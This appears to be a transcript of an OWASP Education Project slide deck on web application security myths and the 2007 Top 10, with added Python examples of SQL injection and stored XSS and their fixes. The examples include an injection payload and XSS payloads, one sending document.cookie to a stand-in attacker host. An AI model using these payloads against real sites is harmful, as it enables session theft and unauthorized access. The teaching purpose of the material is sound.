OWASP Education Project


Transcript OWASP Education Project

Why WebAppsec Matters
Module (to be combined)
OWASP
Education Project
Copyright 2007 © The OWASP Foundation
Permission is granted to copy, distribute and/or modify this document
under the terms of the OWASP License.
The OWASP Foundation
http://www.owasp.org
What goes Wrong?
OWASP
2
Public Health Warning
- XSS and CSRF have evolved
- Any website you visit could infect your browser
- An infected browser can do anything you can do
- An infected browser can scan, infect, spread
- 70-90% of web applications are 'carriers'
Key Application Security Vulnerabilities
http://www.owasp.org/index.php?title=Top_10_2007
Tools – At Best 45%
- MITRE found that all application security tool vendors' claims put together cover only 45% of the known vulnerability types (over 600 in CWE)
- They found very little overlap between tools, so to get to 45% you need them all (assuming their claims are true)
Myth
Myth 1: we are secure because we have a firewall
75% of Internet vulnerabilities are at the web application layer *
* Gartner Group (2002 report)
Myth
Source: Jeremiah Grossman, BlackHat 2001
Myth
Myth 2: we are secure because we use SSL
SSL only secures data in transit; it does not solve vulnerabilities on the:
- Web server
- Browser
Myth
Source: Jeremiah Grossman, BlackHat 2001
Myth
[Slide diagram: the network layer (Firewall, Hardened OS, Web Server, App Server, Firewall) sits in front of the application layer (Custom Developed Application Code, Web Services, Directories, Billing, Human Resources, Legacy Systems, Databases); an APPLICATION ATTACK arrow passes straight through the network layer into the application.]
Your security "perimeter" has huge holes at the application layer.
You can't use network layer protection (firewall, SSL, IDS, hardening) to stop or detect application layer attacks.
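The following is an added worked example, not part of the OWASP deck, that shows why the perimeter in the diagram above is porous. A firewall can only judge the destination port, and SSL only hides the request from anyone in between; a login form that builds its SQL by string concatenation (OWASP 2007 A2, injection flaws) is exploited by a perfectly ordinary HTTPS POST. The user table, the allowed-port list and the form data are constructed for the example; the `sqlite3` in-memory database stands in for the application's real database.

```python
import sqlite3

# Constructed example: what a packet-filtering firewall sees. It allows TCP/443 to
# the web server and knows nothing about the HTTP request inside the TLS stream.
ALLOWED_PORTS = {80, 443}


def firewall_allows(dst_port: int) -> bool:
    """Network-layer check: the port is the only thing a packet filter can judge."""
    return dst_port in ALLOWED_PORTS


def make_db() -> sqlite3.Connection:
    """Constructed in-memory user table standing in for the application's database."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('alice', 'correct horse')")
    db.commit()
    return db


def login_vulnerable(db: sqlite3.Connection, user: str, password: str) -> bool:
    """Builds the query by string concatenation (OWASP 2007 A2, injection flaws)."""
    query = ("SELECT COUNT(*) FROM users WHERE name = '" + user +
             "' AND password = '" + password + "'")
    return db.execute(query).fetchone()[0] > 0


def login_hardened(db: sqlite3.Connection, user: str, password: str) -> bool:
    """Same check with bound parameters: input can never become SQL syntax."""
    query = "SELECT COUNT(*) FROM users WHERE name = ? AND password = ?"
    return db.execute(query, (user, password)).fetchone()[0] > 0


def handle_request(db: sqlite3.Connection, dst_port: int, form: dict, hardened: bool) -> str:
    """Full path of one request: firewall first, then the (TLS-decrypted) application logic."""
    if not firewall_allows(dst_port):
        return "blocked by firewall"
    login = login_hardened if hardened else login_vulnerable
    ok = login(db, form["user"], form["password"])
    return "logged in" if ok else "login failed"


# Constructed attacker form data: a valid HTTPS POST as far as the firewall and
# TLS are concerned; only the application itself can tell that it is hostile.
ATTACK_FORM = {"user": "alice", "password": "' OR '1'='1"}
HONEST_FORM = {"user": "alice", "password": "correct horse"}


if __name__ == "__main__":
    db = make_db()
    print(handle_request(db, 443, ATTACK_FORM, hardened=False))  # logged in
    print(handle_request(db, 443, ATTACK_FORM, hardened=True))   # login failed
    print(handle_request(db, 23, ATTACK_FORM, hardened=False))   # blocked by firewall
```

The attacker's password turns the WHERE clause into `name = 'alice' AND password = '' OR '1'='1'`, which is always true, so the vulnerable handler logs the attacker in; the firewall and the TLS tunnel saw nothing wrong because nothing at their layer was wrong. The hardened handler sends the same text as a bound parameter, where it is compared as a literal and fails.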
What is Web Application Security?
Web Application Security
A combination of people, processes, and technology to identify, measure, and manage the risk presented by COTS (*), open source, and custom web applications.
(*) Commercial Off-The-Shelf
People        Processes            Technology
Training      Secure Development   Automated Testing
Awareness     Secure Code Review   Application Firewalls
Guidelines    Security Testing     Secure Configuration
Web Application (in)Security Trends
Trends
Business demands more bells and whistles
Internal applications get ‘web-enabled’ and are
exposed to Intranet or Internet
Increasing complexity of software
Rush software out without adequate testing
Poor security training and awareness
Vulnerabilities: OWASP Top 10 (v 2007)
- A1: Cross site scripting (XSS)
- A2: Injection flaws
- A3: Malicious file execution
- A4: Insecure direct object reference
- A5: Cross site request forgery (CSRF)
- A6: Information leakage and improper error handling
- A7: Broken authentication and session management
- A8: Insecure cryptographic storage
- A9: Insecure communications
- A10: Failure to restrict URL access
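As an added example (not from the OWASP deck), here is the mechanism behind A1 and the "Public Health Warning" slide: a stored comment rendered into a page without output encoding is executed by every visitor's browser with that visitor's session, so the script can do whatever the visitor could do. The comment store, the page templates and the attacker payloads (including the `evil.example` host and the `/account/transfer` endpoint) are constructed for the example; `contains_active_markup` is a deliberately crude helper used only to compare the two renderings, not a real XSS detector.

```python
import html

# Constructed comment store: one honest comment and two planted by an attacker.
# The second is the classic script payload; the third breaks out of a quoted
# attribute, which is why the attribute context below must be encoded too.
COMMENTS = [
    "Great article!",
    "<script>fetch('/account/transfer?to=attacker&amount=1000')</script>",
    '" onmouseover="document.location=\'http://evil.example/\'+document.cookie',
]

PAGE_TEMPLATE = "<h1>Comments</h1>\n{items}"
ITEM_TEMPLATE = '<li title="{c}">{c}</li>'   # user data lands in an attribute and in text


def render_vulnerable(comments):
    """Stored XSS (OWASP 2007 A1): user data is pasted straight into the HTML."""
    items = "\n".join(ITEM_TEMPLATE.format(c=c) for c in comments)
    return PAGE_TEMPLATE.format(items=items)


def render_hardened(comments):
    """Output encoding: <, >, &, " and ' become entities, so the browser displays
    the attacker's text instead of executing it. quote=True (html.escape's default)
    is what protects the title="..." attribute context in ITEM_TEMPLATE."""
    items = "\n".join(ITEM_TEMPLATE.format(c=html.escape(c, quote=True)) for c in comments)
    return PAGE_TEMPLATE.format(items=items)


def contains_active_markup(page: str) -> bool:
    """Crude comparison helper (constructed, not a real detector): a live <script>
    tag or an event-handler attribute boundary means the payload would execute."""
    return "<script>" in page or '" onmouseover="' in page


if __name__ == "__main__":
    print(contains_active_markup(render_vulnerable(COMMENTS)))  # True
    print(contains_active_markup(render_hardened(COMMENTS)))    # False
    print(render_hardened(COMMENTS))
```

The encoded rendering still shows the attacker's comment to readers, which is the intended behaviour: the fix is not to reject angle brackets but to make sure data is never interpreted as markup in the context it lands in. Encoding must match that context (HTML text, attribute, URL, JavaScript), which is why the example encodes quotes as well as angle brackets.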
Attacks
Defacements
Phishing
Denial of Service
Credit Card Stealing
Bot Infection
...
See the Web Hacking Incidents Database on
http://www.webappsec.org/projects/whid/